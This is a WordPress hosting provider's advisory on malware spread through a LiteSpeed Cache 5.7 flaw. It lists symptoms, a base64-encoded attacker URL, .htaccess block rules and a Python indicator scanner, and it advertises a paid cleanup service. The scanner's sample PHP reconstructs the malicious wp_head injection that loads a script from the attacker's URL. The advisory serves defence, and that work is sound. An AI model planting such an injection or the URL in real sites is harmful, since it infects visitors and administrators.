A new vulnerability in the LiteSpeed Cache plugin has led to WordPress websites being infected with malware. You can find out more about the infection in this article.
Vulnerability
Plugin: litespeed-cache (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
Affected version: 5.7
Patched version: 5.7.0.1
More information is available in wp-content/plugins/litespeed-cache/readme.txt.
Symptoms
- Creation of admin users
- Redirects generated by JavaScript that is hooked into wp_head via the clean_header() function
- Infected core files such as wp-blog-header.php
Execution
Attackers can use the vulnerable WordPress plugin to inject arbitrary web scripts into pages, which are executed as soon as an administrator logs into the WordPress dashboard for the first time. The malicious plugin appears on the same day and at the same time as that login.
The whole sequence can be traced in the access.log file.
The injected PHP uses a base64-encoded URL, base64_decode("aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw"), which points to hxxps://dns[.]startservi**founds[.]com/service/f.php (a blacklisted URL).
Sources
https://www.reddit.com/r/Wordpress/comments/1balppf/wpcleansong (User: gemedj89)
https://www.risorsainformatica.com/rimozione-malware-sito-wordpress/
Notes
First discovered on February 27, 2024
Prevention
- Update to the latest version of the LiteSpeed Cache plugin
- HTTP(S) monitoring for /plugins/wp-cleansong/plane.php
- Block requests for song and song1 via .htaccess:
# Return 403 for any request whose query string contains song1 or song2.
# Note: these are unanchored, case-insensitive regex matches, so any query
# string containing those substrings is blocked, not only the malware's own parameters.
RewriteEngine On
RewriteCond %{QUERY_STRING} song1 [NC,OR]
RewriteCond %{QUERY_STRING} song2 [NC]
RewriteRule ^ - [F]
- You can also block plane.php.
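As an added example (not part of this advisory or of the WPspace service), the following script applies the indicators listed above to access.log lines and to PHP source: requests for plane.php, query strings carrying song1/song2, the base64-encoded URL, and the clean_header() hook on wp_head. The sample log lines and PHP snippet are constructed, and the exact add_action('wp_head', 'clean_header') form of the hook is an assumption.

```python
import re

# Indicators taken from the advisory above.
PLANE_PATH = "/plugins/wp-cleansong/plane.php"
QUERY_MARKERS = ("song1", "song2")
# Base64 blob quoted in the advisory (decodes to the blacklisted URL).
B64_MARKER = "aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw"
# Assumption: the redirect JS is registered with add_action('wp_head', 'clean_header').
HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_head['\"]\s*,\s*['\"]clean_header['\"]")

# Apache combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (ip, timestamp, target, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path, _, query = target.partition("?")
        reasons = []
        if path.endswith(PLANE_PATH):
            reasons.append("plane.php")
        # Same unanchored substring match as the .htaccess rule: "song10" would also hit.
        if any(marker in query.lower() for marker in QUERY_MARKERS):
            reasons.append("song query")
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), target, reasons))
    return hits


def scan_php_source(text):
    """Return the indicators found in one PHP file's contents."""
    found = []
    if B64_MARKER in text:
        found.append("base64 url")
    if HOOK_RE.search(text):
        found.append("clean_header wp_head hook")
    return found


# Constructed sample data (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2024:10:14:02 +0100] "GET /wp-content/plugins/wp-cleansong/plane.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Feb/2024:10:14:05 +0100] "POST /wp-admin/admin-ajax.php?action=heartbeat&song1=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Feb/2024:10:15:00 +0100] "GET /blog/my-song-list/ HTTP/1.1" 200 7412 "-" "Mozilla/5.0"',
]
SAMPLE_PHP = """<?php
add_action('wp_head', 'clean_header');
function clean_header() { echo '<script src="' . base64_decode("%s") . '"></script>'; }
""" % B64_MARKER
```

Run scan_access_log() over the real access.log and scan_php_source() over every .php file under the web root; the third sample line is benign ("song" only in the path) and is not flagged.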
Malware removal
If you have problems with malware cleanup, you can use our malware removal service as a WPspace customer. Our team will scan your WordPress installation for malware and clean it up in the best possible way.
If you would like to take advantage of our malware cleanup service, simply write to us via the support chat on wp-space.com. This incurs a one-off cost of € 250 plus VAT.
What does malware cleanup involve?
- We carefully check and examine the suspicious files.
- We clean up your WordPress site and remove the malicious code as well as the newly created users and take further measures to protect your WordPress website.
- We will inform you as soon as the work has been completed.
- If you still have problems with it afterwards, you can simply contact us.